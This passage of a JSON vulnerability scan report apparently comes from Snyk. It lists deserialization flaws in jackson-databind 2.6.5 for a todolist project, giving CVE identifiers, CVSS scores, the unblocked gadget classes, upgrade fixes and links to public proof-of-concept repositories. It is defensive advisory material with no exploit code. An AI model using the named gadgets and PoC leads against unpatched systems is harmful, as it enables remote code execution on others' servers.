"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - 
"cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2620", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/jas502n/jackson-CVE-2020-8840", - "title": "Jackson PoC" - }, - { - "url": "https://github.com/jas502n/CVE-2020-8840", - "title": "PoC" - }, - { - "url": "https://github.com/Veraxy01/CVE-2020-8840", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "assigner": "NVD", - "severity": "critical", - 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:13.011056Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.209202Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:13.031834Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", - "epssDetails": { - "percentile": "0.91001", - "probability": "0.03042", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-8840" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-02-11T07:57:04.144993Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-02-09T21:12:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-02-11T21:12:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:13.031834Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2634", - "title": "Github Issue #1" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2631", - "title": "GitHub Issue #2" - }, - { - "url": 
"https://github.com/fairyming/CVE-2020-9548", - "title": "GitHub PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.016713Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:19.015843Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.132894Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", - "epssDetails": { - "percentile": "0.79604", - "probability": "0.00652", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9546", - "CVE-2020-9547", - "CVE-2020-9548" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5p34-5m6p-p58g", - "GHSA-p43x-xfjf-5jhr", - "GHSA-q93h-jc49-78gg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-02T10:29:31.222015Z", - "functions_new": [ - 
{ - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T05:18:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T05:18:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.132894Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Pedro Sampaio" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.3", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - 
], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2462", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2469", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", - "title": "RedHat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.772859Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.813035Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
"GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - 